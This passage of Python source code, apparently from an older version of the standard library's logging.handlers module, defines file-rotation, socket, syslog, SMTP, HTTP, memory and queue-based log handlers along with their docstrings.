except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=0):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = "%s.%d" % (self.baseFilename, i)
dfn = "%s.%d" % (self.baseFilename, i + 1)
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.baseFilename + ".1"
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
self.mode = 'w'
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
newRolloverAt = newRolloverAt - 3600
else: # DST bows out before next rollover, so we need to add an hour
newRolloverAt = newRolloverAt + 3600
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dfn = self.baseFilename + "." + time.strftime(self.suffix, timeTuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
self.mode = 'w'
self.stream = self._open()
currentTime = int(time.time())
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstNow = time.localtime(currentTime)[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
newRolloverAt = newRolloverAt - 3600
else: # DST bows out before next rollover, so we need to add an hour
newRolloverAt = newRolloverAt + 3600
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=0):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
if not os.path.exists(self.baseFilename):
self.dev, self.ino = -1, -1
else:
stat = os.stat(self.baseFilename)
self.dev, self.ino = stat[ST_DEV], stat[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
if not os.path.exists(self.baseFilename):
stat = None
changed = 1
else:
stat = os.stat(self.baseFilename)
changed = (stat[ST_DEV] != self.dev) or (stat[ST_INO] != self.ino)
if changed and self.stream is not None:
self.stream.flush()
self.stream.close()
self.stream = self._open()
if stat is None:
stat = os.stat(self.baseFilename)
self.dev, self.ino = stat[ST_DEV], stat[ST_INO]
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
The attribute 'closeOnError' is set to 1 - which means that if
a socket error occurs, the socket is silently closed and then
reopened on the next logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
self.sock = None
self.closeOnError = 0
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(s, 'settimeout'):
s.settimeout(timeout)
s.connect((self.host, self.port))
return s
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = 1
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except socket.error:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
if hasattr(self.sock, "sendall"):
self.sock.sendall(s)
else:
sentsofar = 0
left = len(s)
while left > 0:
sent = self.sock.send(s[sentsofar:])
sentsofar = sentsofar + sent
left = left - sent
except socket.error:
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
dummy = self.format(record) # just to get traceback text into record.exc_text
record.exc_info = None # to avoid Unpickleable error
s = pickle.dumps(record.__dict__, 1)
if ei:
record.exc_info = ei # for next handler
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
if self.sock:
self.sock.close()
self.sock = None
logging.Handler.close(self)
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = 0
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, (self.host, self.port))
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=socket.SOCK_DGRAM):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = 1
self._connect_unixsocket(address)
else:
self.unixsocket = 0
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.formatter = None
def _connect_unixsocket(self, address):
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
# syslog may require either DGRAM or STREAM sockets
try:
self.socket.connect(address)
except socket.error:
self.socket.close()
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.connect(address)
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
if self.unixsocket:
self.socket.close()
logging.Handler.close(self)
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
msg = self.format(record) + '\000'
"""
We need to convert record level to lowercase, maybe this will
change in the future.
"""
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
if codecs:
msg = codecs.BOM_UTF8 + msg
msg = prio + msg
try:
if self.unixsocket:
try:
self.socket.send(msg)
except socket.error:
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, tuple):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, tuple):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('u%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip()
h.putheader('Authorization', s)
h.endheaders(data if self.method == "POST" else None)
h.getresponse() #can't do anything with the result
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.buffer = []
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
self.flush()
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
self.flush()
self.target = None
BufferingHandler.close(self)
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
